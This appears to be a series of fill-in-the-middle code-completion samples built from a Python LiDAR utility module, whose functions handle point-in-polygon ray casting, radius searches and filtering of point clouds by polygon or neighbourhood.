inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
<|fim_middle|>
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
<|fim_middle|>
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
<|fim_middle|>
<|fim▁end|> | pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
<|fim_middle|>
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
<|fim_middle|>
if p1x==p2x:
